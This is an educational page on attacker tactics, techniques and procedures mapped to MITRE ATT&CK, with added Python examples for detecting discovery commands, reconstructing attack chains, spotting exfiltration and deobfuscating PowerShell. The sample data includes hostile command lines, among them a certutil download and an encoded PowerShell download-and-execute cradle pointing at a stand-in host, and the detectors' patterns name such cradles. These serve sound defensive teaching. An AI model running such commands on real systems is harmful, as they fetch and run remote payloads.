Common Attack Techniques and Tactics, Techniques and Procedures
Attackers rely on a repeatable toolkit spanning initial access, execution, persistence, and lateral movement. Understanding documented TTPs from frameworks such as MITRE ATT&CK allows investigators to reconstruct attack chains and build detection strategies grounded in observed adversary behaviour.
Common attack techniques are the specific methods adversaries use to achieve goals at each stage of an intrusion: gaining initial access, executing code, establishing persistence, escalating privileges, evading defences, stealing credentials, moving laterally, collecting data, and exfiltrating it. The term TTP, Tactics, Techniques, and Procedures, describes these methods at three levels of abstraction. The MITRE ATT&CK framework, maintained by the non-profit MITRE Corporation, catalogues more than 600 techniques and sub-techniques observed in real intrusions across enterprise, mobile, and industrial control system environments. Investigators use this taxonomy to map evidence found in logs and memory to specific adversary actions and to reconstruct the full attack chain.
Understanding TTPs matters for investigation because attackers are not random. Each threat actor tends to reuse the same techniques across campaigns, often because a particular tool or approach works reliably and they have no incentive to change it. When a forensic analyst identifies a credential dumping tool in memory or a specific type of phishing lure in email logs, that finding points toward a narrower set of possible actors and a predictable set of follow-on actions. This predictability is what makes TTP documentation operationally valuable.
The attack techniques covered here are not theoretical. They appear in criminal prosecutions, civil litigation, national security investigations, and regulatory enforcement actions in jurisdictions including India, the United States, the United Kingdom, and the European Union. India's Information Technology Act 2000 (amended 2008) and the Digital Personal Data Protection Act 2023 both create obligations around breach response and evidence preservation. The US Computer Fraud and Abuse Act, the UK Computer Misuse Act 1990, and the EU Network and Information Security (NIS2) Directive 2022 provide parallel frameworks. Investigators must understand the techniques to gather the evidence that satisfies the legal standards of each jurisdiction.
By the end of this topic you will be able to:
- Describe the three levels of TTP abstraction and explain how the MITRE ATT&CK framework organises them across attack phases.
- Identify the most common initial-access techniques, including spear-phishing variants and exploitation of public-facing applications, and explain the artefacts each leaves behind.
- Explain how credential dumping works and why it enables lateral movement without triggering standard authentication alerts.
- Describe the primary lateral movement techniques and the log sources that investigators use to detect them.
- Apply TTP mapping to an incident scenario, connecting discovered artefacts to specific ATT&CK technique IDs and inferring the likely attack chain.
- MITRE ATT&CK: A publicly available knowledge base of adversary tactics, techniques, and procedures derived from real-world intrusion observations. Maintained by the MITRE Corporation. Techniques are identified by IDs such as T1566 (Phishing) or T1003 (OS Credential Dumping). Used by defenders, threat intelligence teams, and investigators as a common taxonomy.
- Tactic: The adversary's high-level objective at a given stage of the attack: for example, Initial Access, Execution, Persistence, Privilege Escalation, or Exfiltration. ATT&CK defines 14 tactics for enterprise environments. A tactic answers the question 'why is the attacker doing this?'
- Technique: The specific method used to achieve a tactic. For example, the tactic Credential Access can be achieved by the technique OS Credential Dumping (T1003). A single tactic may have many associated techniques.
- Credential dumping: Extraction of authentication credentials from operating system memory, the Windows SAM database, Active Directory, or credential stores. Tools such as Mimikatz target the LSASS process. Dumped credentials allow attackers to authenticate as other users without knowing their passwords in plaintext.
- Lateral movement: Techniques that allow an attacker to move from a compromised system to other systems on the same network. Examples include pass-the-hash, pass-the-ticket, remote service exploitation, and use of legitimate administrative tools such as PsExec or WMI.
- Living-off-the-land (LotL): An attack approach where the adversary uses tools and binaries already present on the target system, such as PowerShell, WMI, certutil, or mshta, rather than introducing new malware. LotL techniques are harder to detect because the executed binaries are legitimate and often whitelisted.
The TTP framework: tactics, techniques, and procedures
The three levels of TTP abstraction serve different audiences and different investigation tasks. Tactics are the highest level: they name the goal the attacker is pursuing at a given moment, such as gaining initial access, maintaining persistence after a reboot, or exfiltrating collected data. MITRE ATT&CK defines 14 tactics for enterprise environments. Knowing which tactic you are dealing with tells you what kind of evidence to look for.
Techniques are one level down: they specify how the tactic is achieved. The tactic Initial Access has 10 associated techniques including Phishing (T1566), Exploit Public-Facing Application (T1190), and Supply Chain Compromise (T1195). Each technique may have sub-techniques. Phishing has three sub-techniques: spear-phishing via attachment (T1566.001), via link (T1566.002), and via service such as social media (T1566.003). Knowing the technique tells you which specific log sources and artefacts to examine.
Procedures are the most granular level: they describe a specific, observed implementation used by a particular actor or tool. The procedure might be 'APT29 used a password-protected ZIP attachment containing a .lnk file that, when executed, ran a PowerShell command to download a second-stage payload from a compromised website.' Procedures are threat-intelligence outputs: they appear in incident reports, vendor advisories, and law enforcement disclosures. They connect abstract techniques to the real forensic artefacts left by specific campaigns.
| Level | Question answered | Investigation use | ATT&CK example |
|---|---|---|---|
| Tactic | Why is the attacker doing this? | Determines evidence category | Credential Access |
| Technique | How is the tactic achieved? | Identifies specific log sources | OS Credential Dumping (T1003) |
| Procedure | What exactly did this actor do? | Maps to specific forensic artefacts | Mimikatz sekurlsa::logonpasswords run against LSASS memory |
Initial access techniques
The most common initial access technique observed across criminal and nation-state intrusions is phishing, specifically spear-phishing. Unlike bulk phishing, spear-phishing is crafted for a target. The attacker researches the target's organisation, role, current projects, and professional contacts before composing the lure. The email typically comes from a domain that closely resembles a trusted sender, or from a legitimately compromised account. Attachments exploit document rendering vulnerabilities or carry macros that execute on opening. Links lead to attacker-controlled pages that harvest credentials or trigger drive-by downloads.
The second most common initial access technique is exploitation of public-facing applications (T1190). Vulnerabilities in web applications, VPN concentrators, email gateways, and remote desktop services are exploited before the vendor has released a patch (zero-day) or after a patch is available but before the organisation has applied it (N-day). The 2021 Microsoft Exchange ProxyLogon vulnerabilities and the 2023 MOVEit Transfer SQL injection vulnerability both resulted in mass exploitation within days of public disclosure, affecting thousands of organisations across multiple countries.
Supply chain compromise (T1195) is a third route: the attacker compromises a trusted software supplier and embeds malicious code into a legitimate update. The 2020 SolarWinds SUNBURST campaign distributed malicious code to approximately 18,000 organisations via a signed software update. The attack bypassed perimeter controls because the malicious binary arrived as a trusted vendor update with a valid digital signature.
Execution and persistence techniques
After gaining access, attackers execute code to establish a foothold. The most common execution techniques rely on interpreters already present on the target system: PowerShell (T1059.001), Windows Command Shell (T1059.003), and Unix shell scripts. This is the living-off-the-land approach. Because PowerShell and cmd.exe are legitimate system binaries, their execution does not by itself indicate compromise. Investigators must look at what those interpreters were told to do: command-line arguments, downloaded files, outbound connections initiated, and processes spawned.
Persistence techniques ensure the attacker retains access after reboots, password changes, or partial remediation. Common methods include: Registry Run Keys and Startup Folder entries (T1547.001), which cause malicious executables to run at every logon; Scheduled Tasks (T1053.005), which execute malicious code at specified times or intervals; service installation (T1543.003), which registers malicious binaries as Windows services; and web shells (T1505.003), which place attacker-controlled code on a web server so that the attacker can reconnect via HTTP even after a VPN credential is revoked.
Web shells deserve separate attention because they are particularly common in incidents originating from web application exploitation. A web shell is a small script, often a single PHP or ASPX file, that accepts commands from the attacker via HTTP parameters and executes them on the server. They are difficult to detect because their traffic resembles legitimate web requests. Investigation requires reviewing web server file creation timestamps, comparing current files to known-good baselines, and searching for files with unusual permission settings or code patterns consistent with command-execution logic.
Credential access and privilege escalation
Credential dumping (T1003) is the most consequential technique in many intrusions because it converts a low-privilege foothold into the ability to authenticate as any user on the network. On Windows systems, the LSASS (Local Security Authority Subsystem Service) process holds authentication material in memory including NTLM password hashes and Kerberos tickets. Tools such as Mimikatz access LSASS memory directly via the Windows debugging API or by reading a memory dump of the LSASS process. The sekurlsa::logonpasswords module extracts hashes and, in some configurations, cleartext passwords stored by Windows Credential Provider.
Pass-the-hash (T1550.002) and pass-the-ticket (T1550.003) are follow-on techniques that use dumped credentials without cracking them. In pass-the-hash, the attacker injects a captured NTLM hash directly into an authentication session, authenticating as the victim user without knowing the password in plaintext. In pass-the-ticket, a captured Kerberos ticket-granting ticket (TGT) is injected into the current session, granting access to all services the original user was entitled to access. Both techniques generate authentication events in Windows Security event logs, but the events appear as legitimate authentications from the victim account, not from the attacker.
Privilege escalation uses vulnerabilities or configuration weaknesses to move from a standard user account to an administrator or SYSTEM account. Common techniques include exploitation of unpatched local privilege escalation vulnerabilities, abuse of misconfigured service permissions (where a low-privilege user can replace a service binary), and token impersonation (T1134), where the attacker captures the access token of a higher-privilege process and impersonates it. On Linux systems, SUID binary abuse and sudo misconfiguration are analogous paths.
Lateral movement and discovery
Lateral movement is the phase where an attacker moves from the initially compromised system to other systems of interest on the network. The primary goal is to reach high-value targets: domain controllers, database servers, file shares containing sensitive data, or endpoints belonging to privileged users. Lateral movement is often the longest phase of an intrusion and generates the most forensic evidence because it involves authentication events, file transfers, and remote process execution across multiple systems.
Remote Services (T1021) covers several sub-techniques. Remote Desktop Protocol (RDP, T1021.001) is frequently abused because it provides a full interactive session on the target system. SMB and Windows Admin Shares (T1021.002) allow file transfer and remote execution using dumped credentials. Windows Management Instrumentation (WMI, T1047), a separate technique, allows remote process execution via a legitimate management protocol that many organisations do not monitor closely. PsExec, a legitimate Sysinternals administration tool, is used to run commands on remote systems by creating a temporary service; it leaves distinctive artefacts in Windows service installation logs and the ADMIN$ share.
Discovery techniques (T1082, T1083, T1018, T1087) precede lateral movement: the attacker enumerates the network, lists active hosts, queries Active Directory for user accounts and group memberships, and identifies high-value targets before moving. Common tools include native Windows commands such as net user, net group, nltest, and ping sweeps using built-in utilities. These commands leave traces in process creation logs (Windows event ID 4688 with command-line auditing enabled) and in PowerShell script block logs.
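The following Python example, added here and not part of the original page, shows how an investigator might triage process-creation records (event 4688 with command-line auditing) for the discovery commands and living-off-the-land binaries described above. The event records, hostnames, accounts and command lines are constructed for the example; the regular expressions are illustrative rather than a complete rule set, and a real deployment would match on a normalised SIEM schema rather than on hand-built dicts.

```python
import re
from collections import defaultdict

# Constructed sample of Security event 4688 records, already normalised into dicts
# the way a SIEM presents them. Hosts, accounts and command lines are made up.
SAMPLE_4688 = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\whoami.exe",
     "cmdline": "whoami /all"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\net1.exe",
     "cmdline": r"C:\Windows\system32\net1 user /domain"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\net1.exe",
     "cmdline": 'net1 group "Domain Admins" /domain'},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\nltest.exe",
     "cmdline": "nltest /dclist:corp.example"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/a.txt C:\\Users\\Public\\a.txt"},
    # Benign administrative activity that should not trigger a discovery rule.
    {"host": "WS02", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\fs01\backups /persistent:no"},
]

# (ATT&CK technique ID, technique name, pattern applied to the normalised command line).
# The IDs are from the ATT&CK enterprise matrix; the patterns are illustrative only.
DISCOVERY_RULES = [
    ("T1033", "System Owner/User Discovery", re.compile(r"^whoami(\.exe)?\b", re.I)),
    ("T1087.002", "Account Discovery: Domain Account",
     re.compile(r"^net1?(\.exe)?\s+user\b.*/domain", re.I)),
    ("T1087.001", "Account Discovery: Local Account",
     re.compile(r"^net1?(\.exe)?\s+user\b(?!.*/domain)", re.I)),
    ("T1069.002", "Permission Groups Discovery: Domain Groups",
     re.compile(r"^net1?(\.exe)?\s+group\b", re.I)),
    ("T1018", "Remote System Discovery",
     re.compile(r"^(nltest|ping|arp|nbtstat)(\.exe)?\b", re.I)),
    ("T1105", "Ingress Tool Transfer (certutil, living off the land)",
     re.compile(r"^certutil(\.exe)?\b.*https?://", re.I)),
]


def normalise(cmdline):
    """Collapse whitespace and strip the directory from the first token so that
    'C:\\Windows\\system32\\net1 user' and 'net1 user' match the same rule."""
    cmd = " ".join(cmdline.strip().split())
    if cmd.startswith('"'):                       # quoted executable path
        end = cmd.find('"', 1)
        if end == -1:
            end = len(cmd)
        first, rest = cmd[1:end], cmd[end + 1:].strip()
    else:
        first, _, rest = cmd.partition(" ")
    first = first.rsplit("\\", 1)[-1]
    return (first + " " + rest).strip()


def classify(event):
    """Return the list of (technique ID, name) rules matched by one 4688 record."""
    cmd = normalise(event["cmdline"])
    return [(tid, name) for tid, name, rx in DISCOVERY_RULES if rx.search(cmd)]


def triage(events, min_hits=3):
    """Group matches by (host, account). A single discovery command is routine
    administration; the same account touching several distinct discovery
    techniques on one host in one batch is the pre-lateral-movement pattern
    worth an analyst's attention."""
    hits = defaultdict(list)
    for ev in events:
        for tid, name in classify(ev):
            hits[(ev["host"], ev["user"])].append((tid, name, ev["cmdline"]))
    flagged = {}
    for key, items in hits.items():
        techniques = sorted({tid for tid, _, _ in items})
        if len(techniques) >= min_hits:
            flagged[key] = techniques
    return dict(hits), flagged


if __name__ == "__main__":
    all_hits, bursts = triage(SAMPLE_4688)
    for (host, user), techniques in bursts.items():
        print(f"{host} {user}: discovery burst across {len(techniques)} techniques")
        for tid, name, cmd in all_hits[(host, user)]:
            print(f"  {tid:<10} {name:<45} {cmd}")
```

The threshold on distinct techniques rather than on raw command count is deliberate: help-desk scripts often run one enumeration command many times, whereas an operator enumerating a new network runs several different ones within minutes.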
| Technique | ATT&CK ID | Primary log source | Key event IDs |
|---|---|---|---|
| Pass-the-hash | T1550.002 | Windows Security log | 4624 (logon type 3), 4625 |
| RDP lateral movement | T1021.001 | Security log, RDP logs | 4624 (logon type 10), 4778 |
| PsExec | T1569.002 | System log, Security log | 7045 (service install), 4624 |
| WMI remote execution | T1047 | WMI activity log | 4688 (child of wmiprvse.exe) |
| Scheduled Task creation | T1053.005 | Security log, Task Scheduler log | 4698, 4702 |
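As an added example (not part of the original page), the Python below applies the table above to a constructed set of events from three hosts and reconstructs the attack chain in the way the learning objectives describe: each event is mapped to an ATT&CK technique ID and tactic, ordered in time, and a pass-the-hash candidate is raised to high confidence only when the source workstation produced an LSASS-access event shortly beforehand. The events, hosts, accounts and field names are invented, and the LSASS rule assumes Sysmon (event 10, process access) is deployed, which the page does not state.

```python
from datetime import datetime, timedelta

# Constructed events from three hosts, normalised into dicts as a SIEM would present
# them. Field names, hosts, accounts and timestamps are made up for this example.
EVENTS = [
    # Sysmon event 10: a process outside the usual system components opens lsass.exe.
    {"ts": "2024-03-04T09:12:10", "host": "WS01", "source": "Sysmon", "id": 10,
     "source_image": r"C:\Users\Public\tool.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    # 4624 logon type 3 with NTLM on the file server, coming from that workstation.
    {"ts": "2024-03-04T09:20:31", "host": "FS01", "source": "Security", "id": 4624,
     "logon_type": 3, "auth_package": "NTLM", "account": r"CORP\admin.t", "src_host": "WS01"},
    # 7045 three seconds later: the temporary service PsExec creates on the target.
    {"ts": "2024-03-04T09:20:34", "host": "FS01", "source": "System", "id": 7045,
     "service_name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    # 4698 scheduled task created on the file server by the same account.
    {"ts": "2024-03-04T09:25:00", "host": "FS01", "source": "Security", "id": 4698,
     "account": r"CORP\admin.t", "task_name": r"\Updater"},
    # 4624 logon type 10 (RDP) on the domain controller, coming from the file server.
    {"ts": "2024-03-04T09:40:12", "host": "DC01", "source": "Security", "id": 4624,
     "logon_type": 10, "auth_package": "Negotiate", "account": r"CORP\admin.t", "src_host": "FS01"},
    # Benign noise: an ordinary Kerberos network logon from another workstation.
    {"ts": "2024-03-04T09:41:00", "host": "FS01", "source": "Security", "id": 4624,
     "logon_type": 3, "auth_package": "Kerberos", "account": r"CORP\jdoe", "src_host": "WS07"},
]


def map_event(ev):
    """Map one event to (tactic, technique ID, technique name, note); None if no rule applies."""
    if (ev["source"] == "Sysmon" and ev["id"] == 10
            and ev.get("target_image", "").lower().endswith(r"\lsass.exe")):
        return ("Credential Access", "T1003.001", "OS Credential Dumping: LSASS Memory",
                f"{ev['source_image']} opened lsass.exe (access {ev['granted_access']})")
    if ev["id"] == 4624 and ev.get("logon_type") == 3 and ev.get("auth_package") == "NTLM":
        # An NTLM network logon on its own is common; it becomes interesting in context.
        return ("Lateral Movement", "T1550.002", "Pass the Hash (candidate)",
                f"NTLM network logon as {ev['account']} from {ev['src_host']}")
    if ev["id"] == 4624 and ev.get("logon_type") == 10:
        return ("Lateral Movement", "T1021.001", "Remote Services: Remote Desktop Protocol",
                f"RDP logon as {ev['account']} from {ev['src_host']}")
    if ev["id"] == 7045 and "psexesvc" in ev.get("service_name", "").lower():
        return ("Execution", "T1569.002", "System Services: Service Execution (PsExec)",
                f"service {ev['service_name']} installed from {ev['image_path']}")
    if ev["id"] == 4698:
        return ("Persistence", "T1053.005", "Scheduled Task/Job: Scheduled Task",
                f"task {ev['task_name']} created by {ev['account']}")
    return None


def reconstruct_chain(events, window=timedelta(minutes=30)):
    """Order mapped events in time. A pass-the-hash candidate is upgraded to high
    confidence when its source host produced an LSASS-access event within `window`
    beforehand: that pairing is the dump-then-reuse sequence described in the text."""
    lsass_access = []            # (time, host) of credential-dumping candidates seen so far
    chain = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        mapped = map_event(ev)
        if mapped is None:
            continue
        tactic, tid, name, note = mapped
        t = datetime.fromisoformat(ev["ts"])
        if tid == "T1003.001":
            lsass_access.append((t, ev["host"]))
        confidence = "medium"
        if tid == "T1550.002" and any(
                h == ev["src_host"] and timedelta(0) <= t - t0 <= window for t0, h in lsass_access):
            confidence = "high"
        chain.append({"time": ev["ts"], "host": ev["host"], "tactic": tactic, "tid": tid,
                      "name": name, "note": note, "confidence": confidence})
    return chain


def hosts_touched(chain):
    """Every host in the chain needs its logs collected, not only the first one."""
    return {step["host"] for step in chain}


if __name__ == "__main__":
    for step in reconstruct_chain(EVENTS):
        print(f"{step['time']} {step['host']:<5} {step['tactic']:<18} {step['tid']:<10} "
              f"[{step['confidence']}] {step['note']}")
    print("hosts to collect from:", sorted(hosts_touched(reconstruct_chain(EVENTS))))
```

The rules are deliberately narrow: an NTLM type-3 logon by itself is not evidence of pass-the-hash, and a 7045 event is only interesting because of the service name and its timing relative to the logon. Correlating across hosts is what turns individually unremarkable events into a chain.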
Exfiltration, command and control, and defence evasion
Command and control (C2) channels allow the attacker to receive outputs from compromised systems and send new instructions. Attackers prefer C2 protocols that blend with legitimate traffic. HTTPS to attacker-controlled domains is the most common approach because it is encrypted and resembles normal web browsing. More sophisticated actors use DNS-over-HTTPS tunnelling (T1071.004), where commands and responses are embedded in DNS queries and answers, making the traffic nearly indistinguishable from routine DNS lookups. Some actors use legitimate cloud services including Google Drive, Dropbox, and GitHub as C2 channels, a technique classified as Web Service (T1102).
Exfiltration techniques transfer collected data to attacker-controlled infrastructure. The most common method is exfiltration over the C2 channel itself (T1041), which avoids creating additional outbound connection patterns. Large-volume exfiltration may use dedicated tools that compress and encrypt data before transfer. Investigators look for unusual outbound data volume to unfamiliar destinations, DNS queries for newly registered domains, and scheduled or automated file transfers at off-hours. Forensic artefacts may include archive files created just before exfiltration, tool binaries in temporary directories, and evidence of data staging in locations accessible to multiple systems.
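The volume-and-destination heuristic described above, as an added Python example that is not part of the original page. It builds a per-host baseline of outbound volume to known destinations from constructed flow summaries, then flags flows to unfamiliar destinations that are far above that baseline, noting off-hours timing as a further reason. The flow records, hostnames, domains and thresholds are invented; a real implementation would draw the baseline from weeks of data and the known-destination list from an allow-list or passive DNS history.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed flow summaries, as a firewall or NetFlow collector might export them.
# Hosts, destinations, volumes and timestamps are made up for this example.
FLOWS = [
    {"ts": "2024-03-04T10:02:00", "host": "WS05", "dst": "updates.example.com", "bytes_out": 1_200_000},
    {"ts": "2024-03-04T11:30:00", "host": "WS05", "dst": "mail.example.com", "bytes_out": 3_500_000},
    {"ts": "2024-03-04T14:05:00", "host": "WS05", "dst": "cdn.example.org", "bytes_out": 2_000_000},
    {"ts": "2024-03-04T16:45:00", "host": "WS05", "dst": "fs01.corp.example", "bytes_out": 4_800_000},
    {"ts": "2024-03-05T02:14:00", "host": "WS05", "dst": "files-sync.example.net", "bytes_out": 420_000_000},
    {"ts": "2024-03-05T09:00:00", "host": "WS09", "dst": "updates.example.com", "bytes_out": 900_000},
]

# Destinations the organisation already expects traffic to (constructed allow-list).
KNOWN_DESTINATIONS = {"updates.example.com", "mail.example.com", "fs01.corp.example"}


def is_off_hours(ts, start=22, end=6):
    """True if the timestamp falls between `start` (evening) and `end` (morning)."""
    hour = datetime.fromisoformat(ts).hour
    return hour >= start or hour < end


def find_exfil_candidates(flows, known, ratio=10, min_bytes=50_000_000):
    """Flag flows to unfamiliar destinations whose volume is at least `ratio` times the
    host's median per-flow volume to known destinations, or above an absolute floor.
    A new destination alone is not flagged: users browse new sites all day."""
    baseline = defaultdict(list)
    for f in flows:
        if f["dst"] in known:
            baseline[f["host"]].append(f["bytes_out"])

    candidates = []
    for f in flows:
        if f["dst"] in known:
            continue
        typical = median(baseline[f["host"]]) if baseline[f["host"]] else None
        large = f["bytes_out"] >= min_bytes or (typical is not None and f["bytes_out"] >= ratio * typical)
        if not large:
            continue
        reasons = ["unfamiliar destination"]
        if typical:
            reasons.append(f"{f['bytes_out'] / typical:.0f}x the host's typical per-flow volume")
        else:
            reasons.append("above absolute volume threshold with no baseline for this host")
        if is_off_hours(f["ts"]):
            reasons.append("off-hours transfer")
        candidates.append({**f, "reasons": reasons})
    return candidates


if __name__ == "__main__":
    for c in find_exfil_candidates(FLOWS, KNOWN_DESTINATIONS):
        print(f"{c['ts']} {c['host']} -> {c['dst']} {c['bytes_out'] / 1e6:.0f} MB: {', '.join(c['reasons'])}")
```

Each candidate is a lead, not a finding: the investigator then looks for the artefacts the paragraph lists, such as archive files created shortly before the flow and staging directories on the source host.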
Defence evasion is the collection of techniques used to avoid detection throughout the intrusion. Key approaches include: indicator removal (T1070), where attackers delete event logs, clear bash history, or remove artefacts; timestomping (T1070.006), where file modification times are altered to disrupt timeline analysis; process injection (T1055), where malicious code is injected into the memory space of a legitimate process such as explorer.exe or svchost.exe to hide its presence; and obfuscated commands (T1027), where PowerShell or cmd.exe commands are encoded in Base64 or broken across multiple variables to avoid signature-based detection. Incident response and malware analysis workflows, covered in depth in the Malware Taxonomy topic, provide the tools to unpack and analyse these evasion artefacts.
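The obfuscated-command point above (Base64-encoded PowerShell and strings split across variables) is the evasion an analyst meets most often when reading 4688 command lines and script block logs. The Python below is an added example, not code from the original page: it unwraps `-EncodedCommand` layers (UTF-16LE Base64, which is how PowerShell expects that argument), rejoins `'a'+'b'` string concatenations, propagates simple `$var='literal';` assignments, and then extracts URLs and indicator patterns from the result. The two sample command lines are constructed in the code itself, the indicator patterns are illustrative, and the rewriting is a heuristic rather than a PowerShell parser.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")        # 'a'+'b'  ->  'ab'
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")       # $name='literal';
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

# (label, pattern) pairs applied to every layer plus the rewritten script. Illustrative only.
INDICATORS = [
    ("download cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("dynamic invocation", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden window / no profile", re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile", re.I)),
    ("nested base64", re.compile(r"FromBase64String", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand argument, or None if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def deobfuscate(script, max_rounds=20):
    """Rejoin split string literals and inline single-quoted variable assignments,
    one assignment per round, until nothing changes."""
    s = script
    for _ in range(max_rounds):
        before = s
        s = CONCAT.sub(r"'\1\2'", s)
        m = ASSIGN.search(s)
        if m:
            name, value = m.group(1), m.group(2)
            rest = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m: "'" + value + "'", s[m.end():])
            s = s[:m.start()] + rest               # drop the assignment once propagated
        if s == before:
            break
    return s


def triage_powershell(cmdline, max_depth=3):
    """Unwrap encoding layers, rewrite simple obfuscation, and summarise what the
    interpreter was actually told to do."""
    layers = [cmdline]
    for _ in range(max_depth):
        inner = decode_encoded_command(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    final = deobfuscate(layers[-1])
    text = "\n".join(layers + [final])
    return {
        "layers": len(layers),
        "decoded": final,
        "rewritten": final != layers[-1],
        "urls": URL.findall(final),
        "indicators": [label for label, rx in INDICATORS if rx.search(text)],
    }


# Constructed samples. The first encodes a download-and-execute one-liner the way an
# -EncodedCommand argument would carry it; the second splits a method name across
# string fragments and a variable. Neither is taken from a real incident.
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
ENCODED_SAMPLE = ("powershell.exe -NoP -W Hidden -Enc "
                  + base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii"))
SPLIT_SAMPLE = ("powershell.exe -c \"$a='Down'+'loadStr'+'ing'; "
                "$w=New-Object Net.WebClient; $w.$a('http://198.51.100.7/s')\"")

if __name__ == "__main__":
    for sample in (ENCODED_SAMPLE, SPLIT_SAMPLE):
        result = triage_powershell(sample)
        print(f"layers={result['layers']} rewritten={result['rewritten']}")
        print("  decoded:   ", result["decoded"])
        print("  urls:      ", result["urls"])
        print("  indicators:", result["indicators"])
```

Indicator matching runs over the outer command line as well as the decoded script because the launch flags (`-W Hidden`, `-NoP`) live in the outer layer while the download logic lives inside; neither layer alone tells the whole story.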
An investigator finds that an attacker used the legitimate Windows tool certutil.exe to download a payload from the internet. Which ATT&CK category best describes this approach?
Key Takeaways
- TTPs describe adversary behaviour at three levels: tactics (goals), techniques (methods), and procedures (specific observed implementations). The MITRE ATT&CK framework provides a common taxonomy across more than 600 enterprise techniques, enabling investigators across jurisdictions to describe findings without ambiguity.
- Spear-phishing and exploitation of public-facing applications are the dominant initial access techniques. Each leaves distinct artefacts in email gateway logs, web server logs, endpoint process creation logs, and browser history.
- Credential dumping using tools such as Mimikatz converts a low-privilege foothold into network-wide access. Pass-the-hash and pass-the-ticket attacks use dumped credentials without cracking them and appear in logs as legitimate authentications, requiring correlation analysis rather than simple failed-login alerting.
- Lateral movement via RDP, SMB, WMI, and PsExec generates authentication events and service installation logs across multiple systems. Investigators must collect logs from every system the attacker touched, not only the initially compromised host.
- Defence evasion techniques including log deletion, timestomping, and process injection are designed to frustrate forensic analysis. Investigators counter them by collecting logs to a central SIEM before attackers can delete local copies, verifying file timestamps against alternative sources such as the Master File Table and event log entries, and analysing memory for injected code.
What does TTP stand for in cybersecurity?
What is spear-phishing and how does it differ from bulk phishing?
What is credential dumping?
What is lateral movement in a cyberattack?
How does MITRE ATT&CK help cyber investigators?